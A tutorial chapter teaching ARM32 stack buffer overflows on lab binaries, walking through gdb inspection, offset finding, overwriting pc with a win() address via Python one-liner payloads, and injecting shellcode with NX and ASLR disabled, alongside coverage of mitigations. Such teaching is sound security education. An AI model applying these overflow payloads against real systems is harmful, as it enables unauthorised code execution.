Introduction to stack buffer overflows
Let's now move on to the exploitation side.
We will start with stack-based buffer overflows. Before diving into this section, make sure you are comfortable with the material from the previous chapters.
Buffer
Before talking about buffer overflows, let's explain what a buffer is.
A buffer is a temporary storage area that holds data in memory.
For example:
char a[5];
Here 'a' is a buffer that can store 5 characters. Simply put, it is a character array with room for 5 characters.
Buffer overflow
Now, what is a buffer overflow?
A buffer overflow, as the name suggests, is the vulnerability that occurs when more bytes are written to a buffer than it can hold.
char a[5];
Above we see a buffer that holds 5 characters. What happens when we try to store more than 5 characters? It overflows.
So where does the overflow happen?
In memory, of course. More specifically, it depends.
The overflow can happen on the stack or on the heap. In this section we focus only on stack-based overflows, so the overflow happens on the stack, which is where the return address and the space for our local variables are stored.
Buffer overflows are serious vulnerabilities: they can crash a program or even be used to execute arbitrary code. This class of vulnerability is still relevant today, so it is important to understand it thoroughly.
Let's understand this better through examples.
A simple bof
I will be demonstrating this in my Azeria Labs VM.
Compile this using gcc.
gcc bof.c -o bof
Now let's run it and see the output.
The program is working normally.
As we can see, it is a simple program with two variables.
One is a buffer that can store 5 characters; the other is an integer variable initialized to 15.
It prints two messages on the screen. The second one asks us to enter some input.
The program reads the user's input with the gets function and writes it to the buffer called 'buf'.
Finally, it prints the value of the integer variable, which is 15.
It's a very small program. What could possibly go wrong? Let's see.
Let's run the program again, but with a longer input. We know that the buffer can hold a maximum of 5 characters, so what happens if we input more?
We can see in the output that the value has changed: it was supposed to print 15, but instead it shows 65. So what happened here?
Our buffer 'buf' only has space for 5 characters, but we provided 9. As a result, the input overflowed into the adjacent memory, which was the space used by the variable 'a' to store the value 15, and that space was overwritten by the "A"s we provided as input.
The value 65 is the decimal value of the character 'A'.
Let's use the calculator to confirm this.
The hex equivalent of decimal 65 is 0x41, which is the ASCII code for the character "A" from our input.
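The overwrite can be reproduced with a small Python model of the stack. This is only a sketch: the 64-byte frame, the offsets, and the run_bof helper are assumptions made for illustration. In particular, 'a' is assumed to sit 8 bytes after the start of 'buf' (5 bytes of buffer plus 3 bytes of padding), which is the layout that would explain a 9-character input turning 15 into 65.

```python
import struct

BUF_OFFSET = 0   # 'buf' sits at the lowest address of the modelled frame
A_OFFSET = 8     # assumed: 5 bytes of 'buf' plus 3 bytes of padding before 'a'


def run_bof(user_input: bytes) -> int:
    """Model of the program: a = 15, gets(buf), then report the value of a."""
    frame = bytearray(64)                          # simulated stack memory
    struct.pack_into("<i", frame, A_OFFSET, 15)    # int a = 15, little-endian
    data = user_input + b"\x00"                    # gets() appends a null terminator
    # No bounds check here, just like gets(): the write can run past 'buf'.
    frame[BUF_OFFSET:BUF_OFFSET + len(data)] = data
    return struct.unpack_from("<i", frame, A_OFFSET)[0]


print(run_bof(b"AAAA"))     # 15
print(run_bof(b"A" * 9))    # 65
```

The ninth "A" lands on the lowest byte of 'a', and the terminator written after it clears the next byte, so 'a' reads as 0x00000041.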
Let's run the program again and add some more input.
The value of 'a' has now changed to a very strange number, and the program also prints "Segmentation fault" on the screen.
What is a Segmentation fault?
A segmentation fault happens when a program tries to access memory it is not allowed to access, for example by writing to a read-only location or by reading, writing, or executing at an invalid address. We will come back to this later.
Now, this value 1094795585 is actually our "A"s. We can confirm this with the calculator.
Converting the value to hex gives 0x41414141, and converting that to ASCII gives four "A"s, which together occupy four bytes (the size of an integer).
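The same conversion can be checked without a calculator. A minimal sketch using only Python built-ins:

```python
value = 1094795585

as_hex = hex(value)                     # decimal -> hex
as_bytes = value.to_bytes(4, "little")  # the four bytes as stored in memory

print(as_hex)                    # 0x41414141
print(as_bytes)                  # b'AAAA'
print(ord("A"), hex(ord("A")))   # 65 0x41
```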
Vulnerable C functions
We have confirmed that the buffer overflowed and overwrote the adjacent data. But what actually causes this to happen?
Our input, right?
But what allowed the attacker to supply such a large input?
The only thing the attacker controls is the input, and this input is handled by the gets() function.
Yes, you guessed it right: the culprit here is gets(). It is the reason we are allowed to enter such a long string.
gets() does not do any bounds checking, which is why we could enter as many characters as we liked. So when writing your own programs, avoid gets() and use fgets() to accept input instead.
Another example of a vulnerable C library function is strcpy(), which is used to copy strings. Like gets(), it does no bounds checking, so we can copy a string that is larger than the destination buffer can hold and overflow it.
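The difference between an unchecked copy and a bounded one can be modelled in a few lines. This is a sketch in Python rather than C, and unsafe_copy and bounded_copy are hypothetical helpers that only imitate the behaviour of gets()/strcpy() and fgets(); the 5-byte buffer followed by the bytes "XYZ" is an assumed layout.

```python
def unsafe_copy(dest: bytearray, offset: int, src: bytes) -> None:
    """Like gets()/strcpy(): copies everything plus a null terminator."""
    data = src + b"\x00"
    dest[offset:offset + len(data)] = data


def bounded_copy(dest: bytearray, offset: int, src: bytes, size: int) -> None:
    """Like fgets(buf, size, ...): stores at most size - 1 bytes plus a terminator."""
    data = src[:size - 1] + b"\x00"
    dest[offset:offset + len(data)] = data


# A 5-byte buffer followed by three bytes of neighbouring data.
victim = bytearray(b"\x00" * 5 + b"XYZ")
unsafe_copy(victim, 0, b"AAAAAAA")
print(bytes(victim[5:]))    # b'AA\x00'  (the neighbour was overwritten)

safe = bytearray(b"\x00" * 5 + b"XYZ")
bounded_copy(safe, 0, b"AAAAAAA", 5)
print(bytes(safe[5:]))      # b'XYZ'     (the neighbour is intact)
```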
Memory layout
Now let's look at the memory layout visually to understand this better.
There are two local variables on the stack.
This is the case in normal execution, that is, when we provide safe input.
Let's see what happens when we input more characters than the buffer can accommodate.
So the "A"s overflowed and filled the adjacent memory that was allocated to the variable 'a' for storing the integer value 15. As a result, the value 15 in 'a' was overwritten with the "A"s we provided.
The size of an integer is 4 bytes. So the four "A"s (0x41414141 in hex, one byte per character) that now fill the integer variable 'a' are read as a single 4-byte value and printed in decimal: 1094795585.
Now let's look at the memory layout live using gdb.
Load the program into gdb.
gdb ./bof1
Now put a breakpoint at the last instruction of the main function.
0x000104bc <+64>: pop {r11, pc}
Now run the program using the 'r' command.
Let's provide a safe input first so that we can see the layout in normal execution. I will enter 4 "A"s.
Once we hit the breakpoint, use the examine command to inspect the memory layout.
We see both our buffer and the variable 'a'. The value 15 is 0xf in hex, so that is our variable 'a'. Note that the buffer is placed at a lower address than 'a', so writing past the end of the buffer moves toward 'a'. (The stack grows from high memory to low memory.)
Now let's see what happens when we overflow our buffer.
We can see that the memory location that had the value 0x0000000f (15) is overwritten by our "A"s.
This is what buffer overflow in our memory looks like.
Now let's do a simple challenge.
Challenge 0x1
Compile this source code using gcc.
gcc challenge1.c -o challenge1
The challenge is to get a shell by overwriting the 'pass' variable with the value 0x42434241.
Try it out yourself first.
If you haven't figured it out, let's walk through the solution.
Solution 0x1
Looking at the source code, we can see that the variable 'pass' is initialized with the value 1234. We also have a buffer named 'buf' that stores a maximum of 10 characters.
And finally, we have our vulnerable function 'gets', which writes data into the buffer. So we can confirm that the program has a buffer overflow vulnerability.
So, to win the challenge, we need to overflow the buffer and change the value of the 'pass' variable to 0x42434241.
Let's run the program and check whether our hypothesis is right.
When the input is within limits, the program exits normally. In this case, the program prints the "pass" variable as 4d2, which is 1234 in decimal.
In the second case, we provided more input than the buffer can hold; this overflowed the buffer and overwrote the "pass" variable.
As we can see, the output of the "pass" variable is 0x41414141, which corresponds to our input "AAAA".
So what we need to do is change the value of "pass" from 1234 to 0x42434241. Let's convert the hex to characters and use them as input.
0x42434241 corresponds to the characters "BCBA". But we need to pass them in reverse order, "ABCB", because the value is stored in little-endian format (least significant byte first). Overwriting "pass" with this value makes the program call the "system" function.
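The byte reversal can be double-checked with Python's struct module. A minimal sketch, where "<I" means an unsigned 32-bit integer in little-endian order:

```python
import struct

target = 0x42434241

# Reading the hex digits left to right gives the characters in big-endian order.
print(bytes.fromhex("42434241"))        # b'BCBA'

# In little-endian memory the least significant byte (0x41) comes first.
in_memory = struct.pack("<I", target)
print(in_memory)                        # b'ABCB'
```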
Now let's pass these characters through the input. But first we need to identify which part of the input overwrites the "pass" variable.
Let's analyze the example diagram below.
In the example diagram our input is 9 "A"s followed by 4 "B"s. As the picture depicts, the first 9 characters fill the space up to the "pass" variable, so we need to supply them first. Only the characters after the 9th position (that is, from the 10th character onward) overwrite the "pass" variable.
So when we exploit a buffer overflow, we usually need to find out which position in the input ends up at a specific location on the stack.
We could find the position by trial and error, but that is very time-consuming. A simpler way is to send a unique pattern as input. There are third-party tools online for this.
To solve this problem, I will use the first website.
We can copy this pattern of 200 characters and provide it as input to the program.
Let's copy the value of "pass" from the output and paste it into the website to find its position.
So it takes 12 characters to fill the buffer and reach the "pass" variable; the 13th character onward starts overwriting it.
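What such pattern tools do can be sketched in a few lines of Python. This is not the code behind any particular website: pattern_create and pattern_offset are hypothetical helpers that build the familiar "Aa0Aa1Aa2..." sequence and search it for the four bytes that ended up in the overwritten variable.

```python
import string
from itertools import product


def pattern_create(length: int) -> bytes:
    """Build a non-repeating pattern such as Aa0Aa1Aa2... of the given length."""
    chunks = []
    for upper, lower, digit in product(
        string.ascii_uppercase, string.ascii_lowercase, string.digits
    ):
        chunks.append(upper + lower + digit)
        if len(chunks) * 3 >= length:
            break
    return "".join(chunks)[:length].encode("ascii")


def pattern_offset(value: int, length: int = 200) -> int:
    """Offset of a 32-bit value read from little-endian memory, or -1 if absent."""
    needle = value.to_bytes(4, "little")
    return pattern_create(length).find(needle)


pattern = pattern_create(200)
# Pretend the variable sits 12 bytes into the input and was printed as a number.
leaked = int.from_bytes(pattern[12:16], "little")
print(hex(leaked), pattern_offset(leaked))   # 0x41346141 12
```

Because every four-byte window of the pattern is unique at this length, the value read back from the overwritten variable identifies exactly one position in the input.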
So we can send 12 junk characters to reach the "pass" variable and then overwrite it with "ABCB" to execute the system function.
Let's try that.
It overwrote the "pass" variable with the value 0x42434241 and we got our shell.
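The input for this challenge can be assembled and checked against a simple model of the stack. This is a sketch under the assumption that "pass" sits 12 bytes after the start of the buffer, as the pattern offset indicated; run_challenge is a hypothetical stand-in for the real binary and only reports the final value of "pass".

```python
import struct

PASS_OFFSET = 12   # junk bytes needed before "pass" is reached


def run_challenge(user_input: bytes) -> int:
    """Model of the challenge: pass = 1234, gets(buf), then return pass."""
    frame = bytearray(64)
    struct.pack_into("<I", frame, PASS_OFFSET, 1234)
    data = user_input + b"\x00"          # gets() appends a null terminator
    frame[0:len(data)] = data            # unchecked write, like gets()
    return struct.unpack_from("<I", frame, PASS_OFFSET)[0]


payload = b"A" * PASS_OFFSET + b"ABCB"

print(hex(run_challenge(b"hello")))   # 0x4d2
print(hex(run_challenge(payload)))    # 0x42434241
```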
Redirecting the execution
Let's come back to the segmentation fault.
As we learned in the stack section, when a function is called, the return address is copied to the "LR" register. At the beginning of the function it is pushed onto the stack so that "LR" can be reused, and at the end of the function, after all its instructions have completed, it is popped back off the stack.
When we were playing with the binary above, we saw the program crash with a "segmentation fault".
Why did that error occur?
Recall that a segmentation fault happens when a program tries to access memory it is not allowed to access, such as writing to a read-only location or using an invalid address.
So what's the invalid address here? Let's figure this out by working through a challenge.
Compile this using gcc
We can see that this program uses strcpy(), a vulnerable function that does no bounds checking, so we can overflow the buffer.
Let's try that.
As expected the program crashed.
It also prints the "Segmentation fault" message, so let's inspect the crash using gdb.
Load it into gdb and run it.
Gdb shows the reason for the crash, which is a segmentation fault (SIGSEGV).
Gdb also says "Cannot disassemble from $PC". As we know, pc (the program counter) holds the address of the next instruction to be executed, and the processor fetches instructions from the address it points to.
If we look at pc here, it holds the address 0x42424242, which is our input "BBBB". So we can conclude that our input also overwrote pc. When the processor tries to fetch an instruction from 0x42424242 it crashes, because that is not a valid address. This is why our program crashes.
Let's see how this pc gets overwritten.
Load the program into gdb and put a breakpoint (bp) at the instruction that branches to the "vulnerable" function.
Run the program with our large input.
gef> r AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
It hit our bp.
Now keep an eye on the "LR" register. Once the branch executes, it will contain the address of the next instruction in the main function:
0x00010540 <+68>: mov r0, #0
Let's step into the vulnerable function using the "si" command.
Now we are inside the vulnerable function and "lr" holds the return address. The first push instruction pushes the r11 and lr registers onto the stack. We can execute this instruction by stepping through it.
si
As expected, both r11 and lr are pushed onto the stack. Put a bp at the pop instruction of the vulnerable function.
Let's continue execution using the "c" command until it hits the bp.
We can see that our stack is overwritten by our "A"s. The pop instruction will now remove the top two values from the stack and copy them into r11 and pc. If we hadn't overflowed the buffer, the correct values would be popped into the registers and execution would continue normally.
As a result of the overflow, both r11 and pc will end up holding 0x41414141.
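The push/overflow/pop sequence can be modelled as follows. This is a sketch, not a trace of the real binary: the frame size, the saved r11 value, and the offsets 20 and 24 are assumptions (chosen to agree with the 24-byte offset to pc that this walkthrough measures), and call_vulnerable is a hypothetical helper.

```python
import struct

SAVED_R11_OFFSET = 20   # assumed distance from the buffer to the saved r11
SAVED_LR_OFFSET = 24    # assumed distance from the buffer to the saved lr


def call_vulnerable(argument: bytes, r11: int, lr: int):
    """Return the (r11, pc) pair that 'pop {r11, pc}' would load."""
    frame = bytearray(128)
    # push {r11, lr}: both registers are saved above the local buffer.
    struct.pack_into("<II", frame, SAVED_R11_OFFSET, r11, lr)
    # strcpy(buffer, argument): copies until the terminator, no bounds check.
    data = argument + b"\x00"
    frame[0:len(data)] = data
    # pop {r11, pc}: whatever is in the two saved slots now is loaded.
    return struct.unpack_from("<II", frame, SAVED_R11_OFFSET)


SAVED_R11 = 0xbefff204        # hypothetical frame pointer value
RETURN_TO_MAIN = 0x00010540   # the address of the next instruction in main

print([hex(v) for v in call_vulnerable(b"AAAA", SAVED_R11, RETURN_TO_MAIN)])
# ['0xbefff204', '0x10540']
print([hex(v) for v in call_vulnerable(b"A" * 46, SAVED_R11, RETURN_TO_MAIN)])
# ['0x41414141', '0x41414141']
```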
Let's continue the execution to confirm this.
If we try to single-step this instruction it won't work, so remove the breakpoints using
delete breakpoints
Now continue the execution using the "c" command.
The pc and r11 registers are now filled with "AAAA". But pc shows 0x41414140: the last byte is 40 instead of 41. This is because when the least significant bit (LSB) of the address loaded into pc is 1, the processor switches to Thumb mode (Thumb code is entered through odd addresses) and the bit itself is cleared in pc. Since the four "A"s are 0x41414141, whose LSB is 1, the processor switches to Thumb mode. If we look at the cpsr, the "THUMB" flag is set. We don't need to worry about this because we won't be working in Thumb mode.
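The effect of the low bit can be expressed as two bit operations. A minimal sketch, where load_pc is a hypothetical helper modelling only this one detail of an interworking load into pc:

```python
def load_pc(value: int):
    """Split a loaded value into the resulting pc and the Thumb state bit."""
    thumb = bool(value & 1)        # bit 0 selects Thumb mode
    pc = value & 0xFFFFFFFE        # bit 0 is cleared in pc itself
    return pc, thumb


pc, thumb = load_pc(0x41414141)
print(hex(pc), thumb)              # 0x41414140 True
```

An even value such as the address of an ARM-mode function leaves pc unchanged and the Thumb bit clear.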
So this is how pc gets overwritten.
To complete this challenge, we can overflow the buffer and overwrite the return address with the address of the win() function.
First, let's find out the position of the input which overwrites the pc using a pattern generator.
Load the binary into gdb and use the pattern as the argument.
Now the program has crashed. Let's copy the value from pc. Note that the last byte should be 41 according to our input, but it shows 40 because of Thumb mode. So when we copy this value to find the offset, change the 40 to 41.
So we need 24 characters to fill the buffer and reach pc; the 25th character onward overwrites it.
Let's confirm this. I will write a simple Python one-liner and pass its output as an argument to the run command inside gdb.
gef> r $(python -c 'print("A" * 24 + "BBBB")')
As expected the four characters after the 24th character overwrite the pc. Next, we need to find the address of the win() function.
We can use the "disass" command to get the address of the win() function.
The address of the win function is 0x000104d8.
Now we can put this address into the one-liner. But we can't type the address as plain text; each byte has to be given as a hex escape.
For this, we use the format below.
\xeb\x2a //example
So for our address, it should be like this.
\xd8\x04\x01\x00
Note that the byte order is reversed, because memory uses the little-endian format.
The final command will be:
gef> r $(python -c 'print("A" * 24 + "\xd8\x04\x01\x00")')
Let's execute this and see if we get a shell.
It worked perfectly. Let's run this outside gdb.
Make sure ASLR is off.
It works fine. So this is how you can redirect the execution of a program by taking control of the pc register: if we can overwrite the return address, we can control pc.
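The same payload can also be built in a script, which avoids typing the reversed bytes by hand. This is a sketch: build_payload is a hypothetical helper, and the offset and address are the values found above for this particular binary.

```python
import struct

OFFSET_TO_PC = 24          # junk bytes needed before the saved return address
WIN_ADDRESS = 0x000104d8   # address of win() reported by gdb


def build_payload(offset: int, address: int) -> bytes:
    """Junk up to the return address, then the address in little-endian order."""
    return b"A" * offset + struct.pack("<I", address)


payload = build_payload(OFFSET_TO_PC, WIN_ADDRESS)
print(payload[-4:])   # b'\xd8\x04\x01\x00'
print(len(payload))   # 28
```

One caveat when moving from Python 2 to Python 3: print() on a str encodes a character like "\xd8" as two UTF-8 bytes, so raw bytes should be emitted with sys.stdout.buffer.write(payload) instead. The trailing \x00 cannot be passed inside a command-line argument, but strcpy() writes its own null terminator in that position.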
Protection mechanisms
Because buffer overflows are such a critical vulnerability, operating systems and compilers implement several protection mechanisms against their exploitation.
Address space layout randomization (ASLR): ASLR is a security feature that randomizes where data and code are placed in memory. Exploiting a buffer overflow requires the attacker to know or guess the location of functions and buffers in memory, so randomization makes it harder to predict those locations and successfully execute arbitrary code. For example, to solve the last challenge we needed the address of the win() function. With ASLR enabled and the binary built as a position-independent executable, that address would change on every execution, so an address observed in one run would be invalid in the next.
Non-executable memory / Data Execution Prevention (NX/DEP): NX/DEP marks memory regions such as the stack as non-executable. If there is a buffer overflow vulnerability, the attacker can fill the stack with malicious code and try to execute it, but with NX enabled that code will not run. By default the stack is non-executable, meaning that we can't execute any code placed on it. When we did our exercises we purposefully made the stack executable so that we could learn without worrying about this protection, which is why we specified "-z execstack" during compilation.
Stack canaries or security cookies: These are random values placed between the buffer and the return address. Before the function returns, the program checks whether the canary has been overwritten. If it has, the program terminates, which prevents the attacker from taking control of pc through an overwritten return address.
Similarly, the programmer can prevent buffer overflows by checking that user input has the expected format and size. The programmer should also check the size of the input data before writing it into a buffer. Limiting the amount of data that can be written to the buffer prevents an attacker from overflowing it.
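The stack canary idea described above can be illustrated with a toy model. This is a sketch only: real canaries are inserted by the compiler, and the 20-byte buffer, the frame layout, and the guarded_call helper are assumptions made for the example.

```python
import os
import struct

BUF_SIZE = 20
CANARY_OFFSET = BUF_SIZE       # the canary sits right after the buffer
RET_OFFSET = BUF_SIZE + 4      # the return address sits after the canary


def guarded_call(argument: bytes, return_address: int) -> int:
    """Copy without bounds checking, then verify the canary before returning."""
    canary = os.urandom(4)                               # fresh random value
    frame = bytearray(128)
    frame[CANARY_OFFSET:CANARY_OFFSET + 4] = canary
    struct.pack_into("<I", frame, RET_OFFSET, return_address)

    data = argument + b"\x00"
    frame[0:len(data)] = data                            # the vulnerable copy

    if bytes(frame[CANARY_OFFSET:CANARY_OFFSET + 4]) != canary:
        raise RuntimeError("stack smashing detected")    # abort instead of returning
    return struct.unpack_from("<I", frame, RET_OFFSET)[0]


print(hex(guarded_call(b"AAAA", 0x00010540)))   # 0x10540
try:
    guarded_call(b"A" * 28, 0x00010540)
except RuntimeError as exc:
    print(exc)                                   # stack smashing detected
```

An overflow cannot reach the return address without first passing over the canary, so the corruption is noticed before the overwritten address is ever used.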
Introduction to Shellcode
In the challenge above, we exploited the buffer overflow vulnerability to redirect execution to a specific function in the program itself. That challenge was designed purely to help you learn the concept through hands-on experience. In real-world applications, we usually won't find such convenient functions to jump to. For example, if we want a shell, the program is unlikely to contain a function that hands us one.
This is where shellcode comes into play.
So what is shellcode?
Shellcode is a small piece of code, usually written in assembly language and assembled to machine code, that is used as the payload during exploitation. An attacker can inject shellcode directly into a running process, or into the memory of a program that is about to be executed, by taking advantage of vulnerabilities like buffer overflows. With it, the attacker can execute malicious commands, spawn a shell, extract sensitive data, etc. Because shellcode is delivered as raw machine code, it is difficult to read and understand. It is usually stored as a sequence of bytes and is often represented in hexadecimal form.
When there are no useful functions in the binary for an attacker to take advantage of, we can inject shellcode into the buffer and try to execute it. For that to work, NX must be disabled. Most systems have NX enabled by default, so for this exercise we have to turn it off ourselves.
You can write your own shellcode if you know enough assembly. Learning to write shellcode is a real advantage if you do low-level exploitation. Using someone else's shellcode is risky unless it comes from a trusted source, so it is always better to write your own.
If you want to learn to write shellcode for ARM32, check out the Azeria Labs shellcode tutorial: https://azeria-labs.com/writing-arm-shellcode/
https://shell-storm.org/shellcode/index.html is a great place to find shellcode. It hosts shellcode for different architectures such as MIPS, ARM, x86, etc.
Let's try injecting shellcode into the program above.
First, we need to compile the source code again with NX disabled.
Compile it with gcc, passing the flag that disables NX:
gcc challenge2.c -z execstack -o challenge2
The "-z execstack" option makes our stack executable. We can only execute the shellcode if the stack has executable permissions.
Before tinkering with the binary, there are some things to keep in mind about the shellcode.
The shellcode should be small enough to fit the available buffer or space.
It shouldn't contain any bytes that break the exploit. These are called bad characters. For example, if we are exploiting a buffer overflow through the vulnerable strcpy() function, our shellcode shouldn't contain any null bytes ("\0"), because strcpy() stops copying when it encounters the null terminator that marks the end of a string. Similarly, there are other bad characters such as 0x0A (newline). If such a byte appears in the shellcode, the copy is cut short and the shellcode won't work. Which bytes are bad depends on the function used in the program.
You should find an appropriate memory location to place the shellcode.
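The first two points in the list above are easy to check automatically before sending anything. A minimal sketch: find_bad_bytes and fits are hypothetical helpers, and the default bad-byte set (null and newline) is only the example given above; the real set depends on the vulnerable function.

```python
import struct


def find_bad_bytes(payload: bytes, bad: bytes = b"\x00\x0a"):
    """Return (position, byte) pairs for every bad byte found in the payload."""
    return [(i, hex(b)) for i, b in enumerate(payload) if b in bad]


def fits(payload: bytes, space: int) -> bool:
    """True if the payload is no larger than the space available for it."""
    return len(payload) <= space


# The address 0x000104d8 contains a null byte once packed in little-endian order.
print(find_bad_bytes(struct.pack("<I", 0x000104d8)))   # [(3, '0x0')]
# The stack address 0xbefff1f0 has no null or newline bytes.
print(find_bad_bytes(struct.pack("<I", 0xbefff1f0)))   # []
print(fits(b"A" * 30, 20))                              # False
```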
We have two approaches to placing the shellcode in our exploit string.
First approach
We can place the shellcode before the bytes that overwrite pc, in place of the junk we used to fill the buffer. But we should first confirm that there is enough space to fit the shellcode. If there is, we can use the shellcode itself to fill the buffer and then overwrite pc with the starting address of the shellcode.
Let me show a pictorial representation with an example.
Suppose we have a buffer with a maximum size of 20 bytes, and anything we provide beyond those 20 bytes starts overwriting pc. Then the shellcode must fit in those 20 bytes. We then write the starting address of the shellcode over pc, so that execution continues at the shellcode placed in memory.
This approach is limited by the space available before pc: it won't work if the shellcode is too large to fit there.
Second approach
The second approach is to send the shellcode after the bytes that overwrite pc. This approach is more convenient because the size of the shellcode is much less of a constraint. We will be using this approach because the shellcode we are going to use is larger than the available buffer space. First we fill up the buffer with junk characters, then we overwrite pc with the address where the shellcode will land, and finally we append the shellcode.
Let's see a pictorial representation of this approach, using the same example as in approach one.
Now let's start writing our exploit script.
I will create a Python file for the exploit.
As we are using the previous example, we know that we need 24 junk characters to reach the return address and overwrite it.
Now let's declare a variable to store the shellcode.
We will use a shellcode from the site mentioned above. It is a very simple shellcode that gives us a shell by calling the system function. We will look into the system function in the next chapter.
So let's copy this into the exploit script.
Now we need to find a location for placing the shellcode. For this, we must examine the memory locations using GDB.
Let's load the program into gdb and put a breakpoint at the last pop instruction of the vulnerable function.
pi@raspberrypi:~/practice $ gdb ./challenge2
Run the program using the "r" command. For the input argument, we must provide a long string so that we can see the memory locations overwritten by our input. Then we can select a suitable memory location after examining the memory.
First, send 24 "A"s, then overwrite pc with "BBBB" so that we can tell it apart from the "A"s, and then send 50 more "A"s after it.
Let's do that.
We hit our breakpoint. Let's inspect the memory using the examine command to find our suitable memory location.
We can see our exploit string in the stack layout. Now let's choose a location for placing the shellcode. The easiest choice is the location just after the "BBBB" that overwrites pc.
So we can select the location 0xbefff1f0. Now let's update our exploit script.
We entered the address of the memory location, 0xbefff1f0, in little-endian format and finally used the print() function to output the exploit string. Note the order of the variables passed to print():
junk: Overflows and fills the buffer with "A"s.
adr : address of the shellcode. This overwrites the pc
shellcode: The shellcode that we are injecting
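The structure of such an exploit script can be sketched as follows. This is not the author's script: the shellcode bytes are deliberately replaced by a placeholder, and the offset and address are the values observed in this walkthrough, which will differ on other systems.

```python
import struct

OFFSET_TO_PC = 24                 # junk needed to reach the return address
SHELLCODE_ADDRESS = 0xbefff1f0    # stack location just after the overwritten pc

# Placeholder only: paste the real shellcode bytes here.
shellcode = b"<shellcode bytes go here>"

junk = b"A" * OFFSET_TO_PC                      # fills the buffer
adr = struct.pack("<I", SHELLCODE_ADDRESS)      # overwrites pc, little-endian
exploit = junk + adr + shellcode                # the shellcode lands right after pc

print(adr)             # b'\xf0\xf1\xff\xbe'
print(exploit[:28])
```

Because the shellcode is appended after the address, its size is not limited by the 24 bytes in front of pc.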
Let's run this exploit outside gdb. Make sure ASLR is off.
As expected the shellcode worked and we got our shell.
We can also place the shellcode at a different location, but then we need to fill the gap with junk characters to reach that distance. Some people use something called a "NOP sled" to add padding before the shellcode.
NOP stands for "no operation". A NOP sled is a sequence of instructions that don't affect the registers or memory: each one does nothing useful when executed and simply passes execution on to the next instruction. An example of an instruction that can be used in a NOP sled is
mov r1,r1
It won't affect the r1 register: it simply moves the value in r1 into r1 again. As these instructions won't affect our shellcode, we can use them as padding or as placeholders.
The instruction "mov r1,r1" is encoded as the 32-bit word 0xe1a01001. As with addresses, the bytes must be written in little-endian order in the exploit string: "\x01\x10\xa0\xe1".
Try adding this padding before the shellcode and see if it works, as an exercise.
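As a starting point for the exercise, the padding can be generated rather than typed by hand. This is a sketch that assumes the instruction word 0xe1a01001 for "mov r1,r1" is stored in little-endian order like the addresses earlier in this section; add_nop_sled is a hypothetical helper and the shellcode is a placeholder.

```python
import struct

MOV_R1_R1 = 0xe1a01001                 # ARM encoding of "mov r1, r1"
nop = struct.pack("<I", MOV_R1_R1)     # bytes as they must appear in memory
print(nop)                             # b'\x01\x10\xa0\xe1'


def add_nop_sled(shellcode: bytes, count: int) -> bytes:
    """Prefix the shellcode with 'count' no-op instructions (4 bytes each)."""
    return nop * count + shellcode


padded = add_nop_sled(b"<shellcode bytes go here>", 8)
print(len(padded) - len(b"<shellcode bytes go here>"))   # 32
```

With the sled in place, the address written over pc can point at any 4-byte-aligned position inside the padding and execution will still slide into the shellcode.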
Conclusion
In this section we discussed buffer overflows. We looked at how buffer overflows occur and how we can take advantage of them to gain control over execution. We also learned to redirect the execution of a program by exploiting a buffer overflow. Lastly, we discussed the protection mechanisms implemented to prevent buffer overflows.